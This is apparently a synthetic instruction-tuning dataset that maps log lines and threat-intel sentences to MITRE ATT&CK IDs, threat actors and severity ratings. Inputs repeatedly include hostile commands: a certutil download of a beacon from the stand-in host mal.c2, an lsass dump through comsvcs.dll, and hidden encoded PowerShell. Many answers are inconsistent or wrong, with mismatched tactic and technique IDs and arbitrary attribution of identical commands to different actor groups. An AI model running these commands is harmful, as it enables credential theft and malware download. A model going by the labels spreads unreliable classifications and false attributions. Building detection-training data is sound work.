messages listlengths 2 2 |
|---|
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: PowerStallion has been used to monitor process lists.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1057\"]}",
"role": "assistant"
}
] |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.",
"role": "user"
},
{
"content": "{\"tactics... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 2084 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.87.203.179",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0008\", \"TA0010\", \"T... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Consider monitoring API calls such as CredEnumerateA that may list credentials from the Windows Credential Manager.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1555\"... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: JA3 Spoof, LOLBin, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", ... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: For many networks there should not be any, but it depends on how systems on the network are configured and where resources are located.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\"], \"techniques... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (DB-ORACLE-3I78YP2H1P)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Persistence, Impact, Reconnaissance",
"role": "user"
},
{
"cont... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 3521 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.129.73.237",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1098.004\"]... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 617 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, TLS, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"Mustang Panda\", \"conf... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: cmstp.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.69.133.74",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0004\... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: JA3 Spoof, Fileless, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"Mustang Pand... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Adversaries may attempt to find domain-level groups and permission settings.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1069.002\", \"T1069\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (APP-WEB-59I50GPFPS)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Command and Control",
"role": "user"
},
{
"content": "{\"severity\... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (DB-ORACLE-U3BW81OZXG)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Execution",
"role": "user"
},
{
"content": "{\"severity\"... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.2/TCP connection to 1.41.127.166",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0004\", \"TA0011\", \"TA0002\"],... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: TLS, LOLBin, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"APT41\", \"confidence\": \"High\... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Follow Office macro security best practices suitable for your environment.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\"], \"techniques\": [\"T1137\", \"T1137.001\"]}",
"role": "assistant"
}... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Prikormka uses rundll32.exe to load its DLL.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1218\", \"T1218.011\"]}",
"role": "assistant"
}
] |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: wmic.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.2/TCP connection to 1.103.40.243",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0040\", \"TA000... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, JA3 Spoof, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"APT41\", ... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (IAM-ROLE-C8JN9SF1M9)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Reconnaissance",
"role": "user"
},
{
"content": "{\"severity\": \... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, Fileless, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", \"co... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 2235 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.186.109.26",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0001\", \"TA0011\", \"TA0040\"], \"t... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (IAM-ROLE-YNSFEUEJ4W)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Discovery, Reconnaissance, Privilege Escalation",
"role": "user"
... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: smb and exploit in same sentence",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0008\"], \"techniques\": [\"T1210\"]}",
"role": "assistant"
}
] |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: looks for net and account or domain in close proximity",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1201\"]}",
"role": "assistant"
}
] |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Its use of a PowerShell payload means that only legitimate system processes are utilized and that the malicious code execution can only be identified through enhanced logging or in memory",
"role": "user"
},
... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: This will prevent use of application shimming to bypass UAC.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1546\", \"T1546.011\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-2YDME4DRUM)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Execution, Command and Control, Impact",
"role": "user"
},
{
"con... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: RegDuke can hide data in images, including use of the Least Significant Bit (LSB).",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1027.003\", \"T1027\"]}",
"role": "assist... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 3540 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.12.216.163",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0040\", \"TA0004... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: DustySky checks for the existence of anti-virus.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1518.001\", \"T1518\"]}",
"role": "assistant"
}
] |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: overwrite or delete MBR in same sentence",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0040\"], \"techniques\": [\"T1561\", \"T1561.002\"]}",
"role": "assistant"
}
] |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: StreamEx has the ability to enumerate system information.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1082\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: Fileless, LOLBin, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"Mustang Panda\", ... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: cmstp.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.166.132.19",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0040... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: StoneDrill has relied on injecting its payload directly into the process memory of the victim's preferred browser.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0004\", \"TA0005\"], \"techniques\": [\"T1... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Monitor for third-party application logging, messaging, and/or other artifacts that may abuse Microsoft Outlook forms to obtain persistence on a compromised system.",
"role": "user"
},
{
"content": "{\"ta... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, LOLBin, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"Volt Typhoon... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2108 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, JA3 Spoof, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \"con... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (AZURE-VM-AI7OWQFLSS)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Discovery, Persistence",
"role": "user"
},
{
"content": "{\"severity\"... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (DB-ORACLE-LNHKJDBMID)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Exfiltration",
"role": "user"
},
{
"content": "{\"severity\": \"Critic... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-BN6SASLX5H)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Impact",
"role": "user"
},
{
"content": "{\"severity\": \"Criti... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Adversaries may abuse control.exe to proxy execution of malicious payloads.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1218\", \"T1218.002\"]}",
"role": "assista... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: HTTP/TCP connection to 1.190.129.71",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA000... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: LOLBin, JA3 Spoof, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", \"confidence\":... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Monitor for changes made to files for unexpected modifications to unusual accounts outside of normal administration duties",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (IAM-ROLE-N435K4EMP1)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Execution, Credential Access",
"role": "user"
},
{
"content": "{\"s... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (AZURE-VM-QRCHZY7M09)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Reconnaissance",
"role": "user"
},
{
"content": "{\"severity\": \"Criti... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 3522 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.152.252.176",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0008\", \"TA0011\"],... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.2/TCP connection to 1.137.217.62",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\", \"TA0040\", \"TA0004\"], \"techniques\":... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: cmstp.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.140.55.95",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0004\"], \"techn... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (AZURE-VM-9OQIHMU0OV)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Reconnaissance",
"role": "user"
},
{
"content": "{\"severi... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 1794 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.117.23.194",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0043\",... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (WIN-FIN-SRV-PHEBCPXQ8Z)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Credential Access, Execution",
"role": "user"
},
{
"content": "... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (APP-WEB-GVAB9Q0NI2)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Exfiltration, Reconnaissance",
"role": "user"
},
{
"content": "{\"sev... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Backdoor.Oldrea collects information about the OS and computer name.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1082\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, JA3 Spoof, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"APT29\", \"con... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Mis-Type may create a temporary user on the system named \"Lost_{Unique Identifier}.\"",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\"], \"techniques\": [\"T1136\", \"T1136.001\"]}",
"role": "assistant"
}
... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2659 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, WMI, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"Scattered Spider\", ... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: OSX_OCEANLOTUS.D has a variant that is packed with UPX.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1027.002\", \"T1027\"]}",
"role": "assistant"
}
] |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Patch the BIOS and EFI as necessary.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0005\"], \"techniques\": [\"T1542.001\", \"T1542\"]}",
"role": "assistant"
}
] |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Denis can launch a remote shell to execute arbitrary commands on the victim’s machine.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1059.003\", \"T1059\"]}",
"role... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: wmic.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: HTTP/TCP connection to 1.76.105.66",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0040\", \"TA0003\"], \"... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: JA3 Spoof, LOLBin, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"APT29\",... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Subfolders in this directory categorize logs by their related functions, such as:",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1070\", \"T1070.002\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2232 C:\\temp\\lsass.dmp full\nEvasion Methods: Fileless, LOLBin, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"Mustang Panda\", \"c... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: PoisonIvy starts a rootkit from a malicious file dropped to disk.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1014\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (AZURE-VM-EHZ8E37D64)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Lateral Movement, Collection",
"role": "user"
},
{
"content": ... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (WIN-FIN-SRV-FBDGKOQS8H)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Discovery",
"role": "user"
},
{
"content": "{\"severity\": \... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 752 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.73.151.230",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\"], \"techni... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: LOLBin, TLS, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"Scattered Spider\", \"... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: COM + hijack in same sentence",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1546.015\", \"T1546\"]}",
"role": "assistant"
}
] |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Zebrocy performs persistence with a logon script via adding to the Registry key HKCU\\Environment\\UserInitMprLogonScript.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (WIN-FIN-SRV-XNDTBN4MB5)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Defense Evasion, Discovery, Credential Access",
"role": "user"
},
{
... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (APP-WEB-56G0YSPPW4)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Persistence, Collection",
"role": "user"
},
{
"content": "{\... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (APP-WEB-GBLQJWF8VN)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Impact, Credential Access",
"role": "user"
},
{
"content": "{... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (IAM-ROLE-VAZ7L3B9O3)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Defense Evasion, Collection, Privilege Escalation",
"role": "user"
},
... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Hildegard has packed ELF files into other binaries.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1027.002\", \"T1027\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1627 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, LOLBin, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"APT29\", \"confi... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, Base64, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"Volt Typhoo... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (IAM-ROLE-3QDW70C3AV)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Defense Evasion",
"role": "user"
},
{
"content": "{\"severity\": \"H... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Adversaries may attempt to establish persistence by inserting commands into scripts automatically executed by shells.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1546\", \"T... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: ThreatNeedle can run in memory and register its payload as a Windows service.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1543.003\", \"T1543\"]}",
"r... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: cmstp.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.155.105.219",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\", \"TA00... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (APP-WEB-SRVMP5IUA1)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Initial Access, Defense Evasion",
"role": "user"
},
{
"conten... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 1925 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.124.151.247",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (IAM-ROLE-7Q2LMGKQ3W)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Exfiltration, Reconnaissance, Command and Control",
"role": "user"
},
... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: This document was a decoy aimed to entice the user to open malicious documents embedded further down the pageThe actor embedded two additional links and the document urged the user to click on these links for more in... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Inception has incorporated at least five different cloud service providers into their C2 infrastructure including CloudMe.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (APP-WEB-VDET4KKGUH)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Discovery",
"role": "user"
},
{
"content": "{\"severity\": \"High\... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: /var/log/httpd/: Web server access and error logs",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1070\", \"T1070.002\"]}",
"role": "assistant"
}
] |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.97.245.168",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\", \"TA0004\", \"TA0006... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (AZURE-VM-WPU31QC5EN)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Execution",
"role": "user"
},
{
"content": "{\"severity\": \"Cri... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Sandworm Team has distributed NotPetya by compromising the legitimate Ukrainian accounting software M.E.Doc and replacing a legitimate software update with a malicious one.",
"role": "user"
},
{
"content"... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: VPN and to persist in same sentence",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0001\", \"TA0003\"], \"techniques\": [\"T1133\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 840 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, Fileless, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"APT29\", \"conf... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (APP-WEB-YX08XRSFP3)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Execution",
"role": "user"
},
{
"content": "{\"severity\": \"Extreme\... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.29.99.130",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0008\", \"TA0001\"], \"techni... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: CDNs allow an organization to host content from a distributed, load balanced array of servers.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0043\"], \"techniques\": [\"T1596\", \"T1596.004\"]}",
"ro... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.